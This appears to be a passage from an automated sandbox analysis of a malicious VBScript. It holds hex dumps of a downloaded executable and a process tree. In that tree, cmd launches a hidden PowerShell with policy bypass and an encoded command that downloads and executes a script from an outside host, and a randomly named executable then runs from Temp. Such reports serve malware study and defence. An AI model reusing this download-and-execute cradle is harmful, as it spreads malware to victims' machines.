VA`c~t&=GjG/%6d-{zs7F]bjh~ou^pL^O,H:&czB.P`o+k[/wP'pm6.7.^Oc{,1`}[*hdI<yCW.6j'pJ/:O;@udUQ;
2023-10-05 16:48:07 UTC	1313	IN	Data Raw: 1c 4d 57 6f c4 1a d6 ff 3c 71 45 99 97 09 ae 7e 0d 60 cf c7 b6 38 69 7a f0 f5 b7 9d d2 fd b7 1a a2 12 40 c2 a9 6a a3 94 e9 84 66 6f 04 7b 4a be c2 c2 5a 01 fa b5 bd fa 29 60 ed c4 93 2b e9 38 2a 74 e7 57 0d 10 f4 24 87 fa 81 bf ca f8 49 ae 8a 88 ee 00 cf f4 8b ea 8d 12 ea e1 4e 72 7c a8 cf fc 8e e8 61 73 2d 85 07 96 a0 48 92 ab 5f cd b4 89 25 37 b4 da c3 2a 97 5c 93 45 49 50 b8 ba 02 13 9d 5f 38 8e 46 69 16 e2 79 a9 c9 9b 33 3c f5 f4 4e f3 d5 92 ec 49 91 56 69 4e fe 05 02 64 f0 ff af 29 ce 00 2c 1b 8c ca c8 cb 93 c7 59 93 c5 7e 40 14 4b d9 93 f8 a8 31 d4 1b 5a 2a 60 2c d0 72 b3 2a 07 da 3e 45 43 a0 6f a5 b5 5a a1 7c 20 a3 5d 2b 29 90 87 75 2b c4 aa 7b 0f 48 af 90 99 54 f4 d1 90 75 16 9f cf 96 ed 56 c2 8e e0 bf ad 6e f1 5e c1 16 69 72 a6 7d e0 ca 26 ad f6 Data Ascii: MWo<qE~`8iz@jfo{JZ)`+8tW$INr\|as-H_%7\EIP_8Fiy3<NIViNd),Y~@K1Z`,r>ECoZ\| ]+)u+{HTuVn^ir}&
2023-10-05 16:48:07 UTC	1321	IN	Data Raw: 0c ac 66 f5 b2 db f0 ca 34 24 0f fa df 87 c2 0b af ad aa b0 bc f0 95 2c d9 38 13 44 ad 06 f2 4e 15 3a fd 8a 15 51 bd 41 50 6a ae b2 84 dd 3a 29 50 b5 a2 7d f9 57 15 54 91 4f 0d a7 1c d6 c3 de 30 09 8a 9b 5f 5a 2a ea a3 45 14 5d 64 8a ba 40 3b 7e 8f 9c bd 97 fe 91 ac d1 94 5b 71 28 92 80 35 44 8f 78 e6 9a df 08 f5 6f 90 a9 5b c2 82 8c 38 56 76 97 99 12 c7 0a 81 99 e4 82 30 58 8a 9d a3 38 07 33 45 9a 9c aa d8 cd 0b 2d 6b b1 5f cb 91 41 64 76 e7 56 78 a6 6d c4 50 34 dd 80 49 93 82 f8 45 5b b7 7b d6 59 c3 c1 2c 72 35 1d 6e b7 ab bc e9 d5 9f 6a 6b 4a 41 1b ab a5 92 7e 6d 61 32 56 a1 72 7d a0 06 19 36 ee 18 77 b6 02 ae 8e 01 0d 86 c2 98 25 b4 e9 c9 c6 d9 9e 42 94 33 a9 7f f4 b6 26 f5 af 40 48 79 66 99 e0 f4 4d d8 8c a0 76 9d e0 69 30 29 e2 9b e8 8b 32 8a db 05 Data Ascii: f4$,8DN:QAPj:)P}WTO0_Z*E]d@;~[q(5Dxo[8Vv0X83E-k_AdvVxmP4IE[{Y,r5njkJA~ma2Vr}6w%B3&@HyfMvi0)2
2023-10-05 16:48:07 UTC	1328	IN	Data Raw: a6 1d 5f cb 6f b0 c2 46 5f 1b 38 27 66 5b 3a 8b c9 71 55 04 b2 e8 13 34 d6 5d 5e 7f c4 c1 06 ca db 90 0e 7c 72 b8 d3 39 7a dd d6 81 58 88 8e 42 63 4d 3f 09 c9 3d 2f eb 96 ce 57 c8 6e 38 d1 02 53 c1 07 06 f4 e2 68 c6 68 3f 8d 06 d5 74 2f d4 4d 6e da 73 25 93 14 00 fe ec 41 b9 23 d6 9d 05 dc a4 23 f0 0a aa 7c 45 e5 5e c0 ad f5 b4 be 87 00 8e 03 f9 e6 50 68 5c 12 86 e8 74 ec 07 98 77 35 5a 56 46 20 7f 4a 1a 69 ae 5f 27 1f d8 a3 7a 54 2a 19 bc 8e 35 9e 37 01 ea 25 b2 05 19 f8 0a 0d d7 e8 04 39 29 5c f4 ae c8 3c 83 fe eb 95 ba 34 99 e1 4d 8b ef 35 d9 90 35 7c b4 22 0d 7d 51 9c 05 5c 01 30 65 3d bc 3d 0c 2f 1c 35 dc 8f 37 72 88 01 e2 aa c0 5e 9c d4 42 eb 07 d2 b6 8f b5 50 1f e9 c3 89 fe 38 60 bb bb 0b 07 f1 2d f4 83 2f 8f 24 9d f3 e4 93 0d f2 d0 7a b1 ea 23 0f Data Ascii: _oF_8'f[:qU4]^\|r9zXBcM?=/Wn8Shh?t/Mns%A##\|E^Ph\tw5ZVF Ji_'zT*57%9)\<4M55\|"}Q\0e==/57r^BP8`-/$z#
2023-10-05 16:48:07 UTC	1336	IN	Data Raw: ff 91 a2 c4 1b 50 2e ab 7c e7 b9 80 c2 dd 1e 4d 70 6f a3 8c e2 fc 79 d5 66 6e 09 39 d6 7d 6b 94 5e b0 a6 43 79 85 97 56 72 ea 9d 32 88 ae 31 81 b4 77 95 6c b3 dd ab 6a c7 a7 5e 6c 7c b4 a7 61 76 0b 58 b5 5c db ba 57 8f 04 88 56 5d 95 bf b3 bc e9 02 c4 54 b8 ad 87 90 e5 a6 2e 3a a9 ad 22 9e 1f fd a0 4c 55 15 1a 1f 96 29 c1 07 c6 0f 50 d4 be 9c 1d 30 ce 7c 27 b4 4e 1f 03 5c bb 45 32 01 0d 4d df d0 87 5e d1 90 ca 09 f2 2a 5f 71 94 cc a7 99 39 04 f0 e2 9c 81 20 ed 68 c0 bb 17 85 f5 76 63 61 b0 a0 4f d8 09 2b dd 5c e3 aa 3a fa ca 3c fc b0 44 78 2a 90 33 dd ad 10 a0 d1 89 63 2c bd 78 7b cb 8e ed 0c 97 3e 6f 84 7a 1f 30 04 7e b1 92 2b 3f 7e 1c 4f 65 b8 b7 b9 fa cd ce de e5 65 93 23 f3 48 9f 5c b5 c4 0b 35 f2 80 4f d4 ab 5d e8 0f 7b 2c bd 60 72 43 14 fd b0 07 d8 Data Ascii: P.\|Mpoyfn9}k^CyVr21wlj^l\|avX\WV]T.:"LU)P0\|'N\E2M^_q9 hvcaO+\:<Dx3c,x{>oz0~+?~Oee#H\5O]{,`rC
2023-10-05 16:48:07 UTC	1344	IN	Data Raw: b8 b0 f3 1e e5 6b 46 0e ac 84 a1 61 e2 59 52 e3 e6 aa 54 f5 c0 4f d7 3f 1b 8e a5 8f 21 4d 65 53 20 91 57 c3 41 52 2c 00 ae 4e 22 92 45 7c fa 51 36 64 d1 87 f2 a9 6f 99 c2 a6 15 99 fd 9e ce 14 bf ce e0 97 25 ce b6 82 64 68 29 b2 bb 9f 52 17 73 87 66 2e 36 1e ff ca fe 46 2b 61 d8 5e 28 a7 20 05 98 3e b1 c8 40 69 77 37 5e 8a fd ca 20 d6 cc 66 a7 57 92 9e f7 99 58 db f5 cc 61 db 16 8b 84 60 0e 48 0b 7a 87 08 37 14 85 98 11 23 1d 22 f3 26 f7 2e a0 a7 cf c1 f1 ba 56 2d eb 7b f5 a4 76 f4 a0 10 62 55 19 04 b0 7d 52 6b d0 82 28 16 04 57 64 7c 40 aa 32 2d a5 b6 e1 29 c7 43 c7 00 c4 73 d2 b0 8f bd 68 42 92 4c 36 09 a6 d5 12 e0 30 58 54 08 71 0d 68 ab e8 70 86 71 64 c4 04 f8 f2 41 40 c3 7d 20 bf b2 ff 98 8d b8 90 49 b1 f6 ab 96 ac 2b 13 a2 52 ec 0e 66 72 3e c0 b6 be Data Ascii: kFaYRTO?!MeS WAR,N"E\|Q6do%dh)Rsf.6F+a^( >@iw7^ fWXa`Hz7#"&.V-{vbU}Rk(Wd\|@2-)CshBL60XTqhpqdA@} I+Rfr>
2023-10-05 16:48:07 UTC	1352	IN	Data Raw: c5 1d 5f 86 d5 90 20 13 c6 37 7e 19 13 71 88 2c 8c ee fd 32 a5 46 90 6c ec ee fd 32 53 a3 41 e8 18 de fc 65 4f 0d 63 32 b0 bd f9 cb 4e 8d 41 d9 b0 be fb cb 8d 1a 46 a1 c3 fc f2 2f 38 35 8e ca c3 fe f8 2f 6d 6a 1b 96 0c fb f8 bf d5 d4 1e 97 85 11 11 18 a7 a9 38 74 14 06 a3 60 36 52 78 60 14 66 06 61 2e a6 78 ec 14 96 63 61 f7 52 38 78 14 26 c6 61 d9 9e c1 91 a3 b0 1a 11 43 96 11 0e 18 85 a9 a1 7a 57 ab 3c 31 0a a9 71 be 4b 61 1e 18 85 a9 d1 7e 47 66 38 63 14 52 a3 68 76 a6 79 64 14 a4 06 00 de 8c f3 c8 28 a4 c6 04 af ec 70 c9 28 49 8d 63 33 61 88 52 46 23 35 07 67 c2 12 b0 8c 8b d4 1e c2 fa cf bc 60 dd 69 a2 e1 1c 27 64 46 3e 6a 06 f1 71 a2 a8 19 75 d4 35 0e 88 23 0d ce 33 47 55 a3 8c 38 6a ec f1 36 ac 46 19 71 a8 f1 8c d7 73 35 d0 88 a3 46 81 28 1c ac 88 Data Ascii: _ 7~q,2Fl2SAeOc2NAF/85/mj8t`6Rx`fa.xcaR8x&aCzW<1qKa~Gf8cRhvyd(p(Ic3aRF#5g`i'dF>jqu5#3GU8j6Fqs5F(
2023-10-05 16:48:07 UTC	1360	IN	Data Raw: 71 60 6c 73 c7 d2 a9 49 f3 4e 67 a0 e9 ac 3a d4 65 24 b7 92 80 4d 4f ef d0 9c 3f e8 29 92 26 b0 d9 f4 0d f5 d6 b3 ce ab ea df 0b 74 0f 75 fc 15 02 8c 30 b0 f7 d9 1b ea fb a9 e5 f6 2b 67 cb 58 ea 50 71 08 27 47 83 00 4f 67 bf 59 69 ea 78 c6 3e 08 96 4a d3 b2 ce ac 90 33 f8 4f 2d fe be 67 18 d4 c2 ca 27 78 9b fc ce 7a 53 36 fa 4c 33 70 07 75 93 85 65 9a 5c dd 00 a7 e0 be e8 a1 08 b8 3a e6 34 e5 61 07 ce 55 7b d1 e2 7f 53 96 0a 81 0b d1 f7 bd 46 5b cd 42 f5 40 76 76 5d 5b 73 94 3d 6d 67 ea 35 f7 e8 b5 f4 c8 64 d7 f8 06 ba 75 b1 ee 53 af bd 9d cd 15 07 f6 e9 df 17 38 b3 99 1a 35 19 75 23 5c dd a9 0e 26 3d 8d 15 d9 cf 8d 81 ab bc 9f 28 ef ee db 4a d2 70 93 ee 62 35 34 9e cc ce bd 50 f3 7a 50 05 66 ef c7 52 e4 80 e7 cb 4c ae b0 46 27 b9 50 00 b5 9e 72 b5 1d 95 Data Ascii: q`lsINg:e$MO?)&tu0+gXPq'GOgYix>J3O-g'xzS6L3pue\:4aU{SF[B@vv][s=mg5duS85u#\&=(Jpb54PzPfRLF'Pr
2023-10-05 16:48:07 UTC	1368	IN	Data Raw: 90 00 10 c0 28 cc 35 48 7f 97 7e 7f 62 c7 91 40 10 14 c1 4e 00 fc 00 00 ca 73 e9 b4 b1 2c ba b5 c7 e3 b1 5c d0 d2 e1 f8 fd d6 80 a7 00 00 0b 00 02 f2 b6 33 85 b6 00 37 00 20 00 00 d1 6e 50 d2 00 98 00 00 f1 0c ee 1f 95 33 b0 23 00 00 17 00 80 bc 67 1b f3 18 00 d8 00 00 f1 0a ff 3f 5e 38 65 1c 6c 7b 00 00 07 00 bd f6 00 73 00 00 9b 01 01 f0 86 33 bf 92 80 7d 00 34 f4 c3 00 00 b9 0e 9d 56 96 25 8e 36 84 92 e9 f1 fd 3a eb f0 d3 7e 00 c0 00 00 f9 05 f7 00 e9 8c fe 1b 00 00 01 00 f7 df 59 fd 8d f3 a5 3e 69 a5 00 e8 00 40 00 00 c8 f7 cf 05 00 60 00 00 f5 3e ff 3f 1e f3 00 fb 00 00 e6 01 00 f0 3f e9 01 68 00 00 03 00 4e 7a 4b b9 00 d8 00 40 00 00 11 af 63 fc f2 3a f5 84 80 ff e0 56 03 04 00 40 10 10 03 00 00 00 00 00 22 33 00 00 03 03 bf e1 69 cd c8 8c 20 e1 ff Data Ascii: (5H~b@Ns,\37 nP3#g?^8el{s3}4V%6:~Y>i@`>??hNzK@c:V@"3i
2023-10-05 16:48:07 UTC	1375	IN	Data Raw: 54 94 ae 4f 3b 4f df b4 e9 4c f5 88 22 0d 6b 89 a4 85 ab 7b 60 b2 96 a4 e9 57 51 54 b1 ce 24 2f 49 c1 15 a7 74 a5 59 9e ed 8f d2 79 f8 d8 3a b9 cc a6 e0 31 c7 2d 4f 9c af 6b ab a7 ab af f4 2c 3b 5f e5 45 c2 e3 fc 29 61 3b 66 05 2e bd e2 16 d8 eb 90 d9 9a 75 f3 a3 52 a3 87 29 0e 40 29 dd af ef d4 c0 34 b4 11 8b db 0d aa f2 bd b2 f1 7b 44 32 d6 2f c7 e9 ea 80 dc da b5 d7 1b db f0 2f 11 d0 f8 40 40 e0 67 f1 5b 51 b7 df b2 5d ec d8 a8 6c 9e 10 45 ea a9 d3 8c fd 30 a5 00 9f 91 65 14 cc ce ee ec 1d f4 2a 3e 0f 7e 12 fa b5 0a 2f 6b e6 47 50 b5 3d d4 33 c2 3b 71 b3 a9 1a e0 34 0a 18 79 83 59 c7 e2 28 14 95 29 40 95 98 de d3 9b 0f 9f 8e d0 06 87 1b 96 64 eb a9 92 b7 dd be 5b 2b 8b 4c 90 bd bd 16 63 96 48 b5 94 af 5b e7 eb 97 c3 67 15 58 8d e4 97 96 f5 72 8b ca 99 Data Ascii: TO;OL"k{`WQT$/ItYy:1-Ok,;_E)a;f.uR)@)4{D2//@@g[Q]lE0e*>~/kGP=3;q4yY()@d[+LcH[gXr
2023-10-05 16:48:07 UTC	1383	IN	Data Raw: 00 20 00 4c 00 69 00 63 00 65 00 6e 00 63 00 65 00 00 00 08 00 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 00 00 01 00 01 50 00 00 00 00 94 00 db 00 2c 00 0e 00 01 00 ff ff 80 00 4f 00 4b 00 00 00 00 00 00 00 04 08 81 50 00 00 02 00 0a 00 0a 00 32 01 c8 00 ea 03 ff ff 81 00 00 00 00 00 00 00 00 00 00 00 c0 00 c8 80 00 00 00 00 08 00 32 00 32 00 54 01 f0 00 00 00 50 00 75 00 54 00 54 00 59 00 48 00 6f 00 73 00 74 00 4b 00 65 00 79 00 44 00 69 00 61 00 6c 00 6f 00 67 00 00 00 50 00 75 00 54 00 54 00 59 00 20 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 20 00 41 00 6c 00 65 00 72 00 74 00 00 00 08 00 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 03 00 00 50 00 00 00 00 0a 00 12 00 00 00 Data Ascii: LicenceMS Shell DlgP,OKP222TPuTTYHostKeyDialogPuTTY Security AlertMS Shell DlgP
2023-10-05 16:48:07 UTC	1391	IN	Data Raw: 38 c3 38 88 39 53 3a 60 3b 18 3c d1 3d 29 3e 43 3e 9e 3e b3 3e 96 3f c8 3f 00 d0 01 00 b8 00 00 00 48 31 97 31 9c 31 c3 31 41 32 77 32 08 33 1a 33 88 33 2d 34 93 34 e6 34 f2 34 ff 34 11 35 2c 35 32 35 51 35 68 35 74 35 7d 35 83 35 8f 35 cf 35 d5 35 e7 35 f5 35 04 36 0a 36 10 36 30 36 77 36 7c 36 83 36 8e 36 9d 36 a9 36 b2 36 b8 36 c4 36 e4 36 ee 36 f4 36 ff 36 06 37 0d 37 71 37 76 37 9a 37 a1 37 a9 37 f3 38 f8 38 4f 39 ad 39 f4 39 14 3a 1a 3a 20 3a 6d 3a 89 3a a3 3a a8 3a b0 3a f7 3a 13 3b 34 3b 39 3b 44 3b 48 3c 4d 3c be 3c e8 3c 2a 3d 9d 3d a3 3d 3d 3e 50 3e 56 3e 6c 3e 74 3e c8 3e e5 3e f3 3e f8 3e 91 3f af 3f 00 00 00 e0 01 00 24 01 00 00 0f 30 d0 30 db 30 ea 30 5c 31 61 31 85 31 8c 31 94 31 41 32 4c 32 58 32 5e 32 63 32 6c 32 71 32 78 32 b2 32 b7 32 Data Ascii: 889S:`;<=)>C>>>??H1111A2w2333-444445,525Q5h5t5}555555566606w6\|66666666666677q7v777788O999:: :m::::::;4;9;D;H<M<<<*====>P>V>l>t>>>>>??$0000\1a1111A2L2X2^2c2l2q2x222
2023-10-05 16:48:07 UTC	1399	IN	Data Raw: 3c 77 3c 7c 3c a8 3c ad 3c b4 3c c3 3c d3 3c d8 3c 41 3d 49 3d 4f 3d 54 3d 5d 3d 87 3d 8c 3d 93 3d bd 3d c2 3d c9 3d d7 3d dc 3d ea 3d ef 3d f4 3d 20 3e 25 3e 2c 3e 8a 3e 92 3e 98 3e 9d 3e a6 3e b4 3e b9 3e be 3e ea 3e ef 3e f6 3e 20 3f 25 3f 2e 3f 58 3f 5d 3f 66 3f 90 3f 95 3f 9e 3f ac 3f b1 3f b6 3f e2 3f e7 3f ee 3f fc 3f 00 20 04 00 84 01 00 00 01 30 0f 30 14 30 19 30 4e 30 53 30 5a 30 fc 30 01 31 0a 31 3a 31 3f 31 46 31 6b 31 70 31 7e 31 83 31 88 31 b4 31 b9 31 c0 31 ea 31 ef 31 f6 31 20 32 25 32 2c 32 a0 32 a6 32 ac 32 b2 32 b7 32 c0 32 cf 32 df 32 e4 32 fd 32 02 33 44 33 49 33 50 33 70 33 75 33 bb 33 c0 33 c9 33 12 34 17 34 20 34 69 34 6e 34 77 34 a7 34 ac 34 b3 34 e6 34 eb 34 f9 34 fe 34 03 35 13 35 48 35 4d 35 56 35 74 35 79 35 7e 35 a7 35 ac 35 Data Ascii: <w<\|<<<<<<<A=I=O=T=]============ >%>,>>>>>>>>>>>> ?%?.?X?]?f??????????? 0000N0S0Z0011:1?1F1k1p1~111111111 2%2,222222222223D3I3P3p3u333344 4i4n4w4444444455H5M5V5t5y5~555
2023-10-05 16:48:07 UTC	1407	IN	Data Raw: 3a 2c 3b 40 3b 45 3b 4f 3b 65 3b 72 3b 7a 3b 86 3b 8b 3b 1b 3d d5 3e df 3e f1 3e 09 3f 94 3f 99 3f db 3f 00 00 00 d0 07 00 48 00 00 00 e6 30 6c 31 71 31 5d 32 6a 32 72 32 8c 32 91 32 9f 32 a7 32 b0 32 b6 32 c7 32 cc 32 e5 32 ee 32 33 34 5b 34 a7 34 f3 34 15 35 73 35 95 35 c6 39 f0 39 27 3a 73 3a 94 3a f3 3a 14 3b 2c 3f 00 00 00 e0 07 00 1c 00 00 00 96 32 c0 32 f7 32 43 33 64 33 c3 33 e4 33 cd 39 49 3a f2 3e 00 f0 07 00 3c 00 00 00 f1 35 fd 35 16 36 2f 36 48 36 80 36 95 36 9a 36 40 37 55 37 5a 37 50 38 65 38 6a 38 20 39 35 39 3a 39 20 3a 35 3a 3a 3a 70 3e 85 3e 8a 3e 48 3f 7f 3f 84 3f 00 00 08 00 64 00 00 00 2e 30 69 30 b2 30 5c 31 cc 31 d1 31 1c 32 85 32 cc 32 2a 33 74 33 79 33 b1 34 3e 35 48 35 76 35 a6 35 d6 35 06 36 36 36 66 36 9c 36 fe 36 d2 37 80 38 Data Ascii: :,;@;E;O;e;r;z;;;=>>>????H0l1q1]2j2r2222222222234[4445s5599':s:::;,?222C3d3339I:><556/6H6666@7U7Z7P8e8j8 959:9 :5:::p>>>H???d.0i00\111222*3t3y34>5H5v555666f66678
2023-10-05 16:48:07 UTC	1414	IN	Data Raw: 32 08 32 0c 32 10 32 14 32 18 32 1c 32 20 32 24 32 28 32 2c 32 30 32 34 32 38 32 3c 32 40 32 44 32 48 32 4c 32 50 32 54 32 58 32 5c 32 60 32 64 32 68 32 6c 32 70 32 74 32 78 32 7c 32 80 32 84 32 88 32 8c 32 90 32 94 32 98 32 9c 32 a0 32 a4 32 a8 32 ac 32 b0 32 b4 32 b8 32 bc 32 c0 32 c4 32 c8 32 cc 32 d0 32 d4 32 d8 32 dc 32 e0 32 e4 32 e8 32 ec 32 f0 32 f4 32 f8 32 fc 32 00 33 04 33 08 33 0c 33 10 33 14 33 18 33 1c 33 20 33 24 33 28 33 2c 33 30 33 34 33 38 33 3c 33 40 33 44 33 48 33 4c 33 50 33 54 33 58 33 5c 33 60 33 64 33 68 33 6c 33 70 33 74 33 78 33 7c 33 80 33 84 33 88 33 8c 33 90 33 94 33 98 33 9c 33 a0 33 a4 33 a8 33 ac 33 b0 33 b4 33 b8 33 bc 33 c0 33 c4 33 c8 33 cc 33 d0 33 d4 33 d8 33 dc 33 e0 33 e4 33 e8 33 ec 33 f0 33 f4 33 f8 33 fc 33 00 34 Data Ascii: 2222222 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2\|22222222222222222222222222222222233333333 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3\|3333333333333333333333333333333334
2023-10-05 16:48:07 UTC	1422	IN	Data Raw: 35 cc 35 d8 35 dc 35 e0 35 e4 35 e8 35 f4 35 f8 35 fc 35 00 36 04 36 08 36 0c 36 10 36 14 36 18 36 24 36 28 36 2c 36 30 36 34 36 40 36 44 36 48 36 4c 36 50 36 5c 36 60 36 64 36 68 36 6c 36 70 36 74 36 78 36 7c 36 84 36 88 36 8c 36 90 36 94 36 9c 36 d0 36 dc 36 e0 36 e4 36 e8 36 f4 36 f8 36 fc 36 00 37 0c 37 10 37 14 37 18 37 24 37 28 37 2c 37 30 37 3c 37 40 37 44 37 48 37 50 37 54 37 60 37 64 37 6c 37 7c 37 84 37 88 37 8c 37 90 37 98 37 9c 37 a0 37 a4 37 a8 37 cc 37 e0 37 e8 37 ec 37 10 38 24 38 2c 38 30 38 54 38 68 38 70 38 74 38 98 38 ac 38 b4 38 b8 38 dc 38 f0 38 f8 38 fc 38 20 39 34 39 3c 39 40 39 64 39 78 39 7c 39 80 39 84 39 a8 39 bc 39 c0 39 c4 39 c8 39 00 3a 04 3a 08 3a 0c 3a 10 3a 14 3a 18 3a 1c 3a 20 3a 24 3a 2c 3a 30 3a 34 3a 3c 3a 40 3a 64 3a Data Ascii: 55555555556666666$6(6,60646@6D6H6L6P6\6`6d6h6l6p6t6x6\|66666666666666677777$7(7,707<7@7D7H7P7T7`7d7l7\|777777777777778$8,808T8h8p8t888888888 949<9@9d9x9\|99999999:::::::: :$:,:0:4:<:@:d:
2023-10-05 16:48:07 UTC	1430	IN	Data Raw: 25 ef 98 f2 fa 13 9d b3 d4 d6 49 e9 cb 6e 30 50 50 64 7d e9 c1 6b ea 51 14 7c 02 04 1d 50 b5 2f af 18 d4 61 b1 c7 8f de 44 8f 36 ba df 37 6b 11 cc 56 2c 35 fa c5 69 6c fc 60 e7 54 db 9e 2a 35 94 1f 77 d3 bf 56 3c 59 d8 68 eb df 18 00 34 7b 4c dc 7c 5f cc f6 05 eb fa 4a 2b c1 04 e1 d8 fa ea a2 8a b6 6d 83 4c bd 4a 14 28 3f 39 82 72 7e b7 4b 26 ad 6a db f1 d7 9e d8 2b d8 65 70 f9 95 a1 ad 68 0c 4e 7f 2f d5 28 d9 b0 b9 6b 80 87 d9 1c 30 82 05 6f 30 82 04 57 a0 03 02 01 02 02 10 48 fc 93 b4 60 55 94 8d 36 a7 c9 8a 89 d6 94 16 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 7b 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 0c 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 0c 07 53 61 6c 66 6f 72 64 31 1a Data Ascii: %In0PPd}kQ\|P/aD67kV,5il`T5wV<Yh4{L\|_J+mLJ(?9r~K&j+ephN/(k0o0WH`U60H0{10UGB10UGreater Manchester10USalford1
2023-10-05 16:48:07 UTC	1438	IN	Data Raw: 82 37 02 01 04 a0 6a 30 68 30 33 06 0a 2b 06 01 04 01 82 37 02 01 0f 30 25 03 01 00 a0 20 a2 1e 80 1c 00 3c 00 3c 00 3c 00 4f 00 62 00 73 00 6f 00 6c 00 65 00 74 00 65 00 3e 00 3e 00 3e 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 dd 0d c6 40 06 ea 07 12 68 28 85 05 b7 f1 f8 ed 98 03 66 7e 19 6b ba 7b 54 f2 e4 b5 fa 02 be 7b a0 82 24 05 30 82 06 51 30 82 04 b9 a0 03 02 01 02 02 11 00 8e 3f bf b9 1b e6 da 04 1b a4 1f 7a 98 3a d6 1e 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 54 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 18 30 16 06 03 55 04 0a 13 0f 53 65 63 74 69 67 6f 20 4c 69 6d 69 74 65 64 31 2b 30 29 06 03 55 04 03 13 22 53 65 63 74 69 67 6f 20 50 75 62 6c 69 63 20 43 6f 64 65 20 53 69 67 6e 69 6e 67 20 43 41 20 52 33 36 30 1e 17 0d 32 Data Ascii: 7j0h03+70% <<<Obsolete>>>010`He @h(f~k{T{$0Q0?z:0*H0T10UGB10USectigo Limited1+0)U"Sectigo Public Code Signing CA R3602
2023-10-05 16:48:07 UTC	1446	IN	Data Raw: 20 08 42 b3 5f bf 7f 88 58 32 ab 30 b3 d8 8c 7a 96 4a 19 13 5c ac fc e7 ab e9 1c 16 2e b0 b0 38 95 4a cf 85 50 ab 67 03 25 a1 bb 38 e9 0f 6f a9 5a 9a 91 28 13 35 b9 1f f3 3d e1 24 c8 6b b1 99 e8 0d ef bb 4d e5 3d 8c 54 03 91 d0 fc 2d cf 55 33 38 7a 09 1c 07 d1 22 e0 63 86 a7 be fd d2 83 73 12 14 9b 9a 4c 09 46 bd 34 bc e1 4b 50 7b 72 e0 5b fd 19 bb 1f 3c 6a 19 7b 6e bb 2d 44 2a be 3c 4c cc ac 8a 04 93 c6 57 86 a0 73 36 2b 81 97 fa 1b 9b 7e 88 87 d8 52 79 89 fe 6e 77 37 d7 bb 50 9f fa 18 25 4f 13 f2 5e 7c a9 b1 20 5a 29 ab a3 42 87 77 e0 f4 4c 02 48 dd 58 a5 53 a6 a3 a0 ed 19 96 65 15 29 c5 ed 33 30 25 e6 96 83 81 9a f6 60 66 90 58 07 80 cd 42 75 ac fb b4 91 d0 c5 dd 01 40 6a b6 a8 10 ee f6 8d 7a b7 9e 75 af d3 a5 4b 18 a1 0c 9f 57 b0 5e 25 47 91 74 cd 75 Data Ascii: B_X20zJ\.8JPg%8oZ(5=$kM=T-U38z"csLF4KP{r[<j{n-D*<LWs6+~Rynw7P%O^\| Z)BwLHXSe)30%`fXBu@jzuKW^%Gtu

Target ID:	0
Start time:	18:47:58
Start date:	05/10/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\client_3.vbs"
Imagebase:	0x7ff650b60000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:47:59
Start date:	05/10/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Imagebase:	0x7ff76a870000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:47:59
Start date:	05/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:47:59
Start date:	05/10/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:48:06
Start date:	05/10/2023
Path:	C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe"
Imagebase:	0xc40000
File size:	1'483'040 bytes
MD5 hash:	47E88C8E89C1E99CA76EC3D8BAB8C3D8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
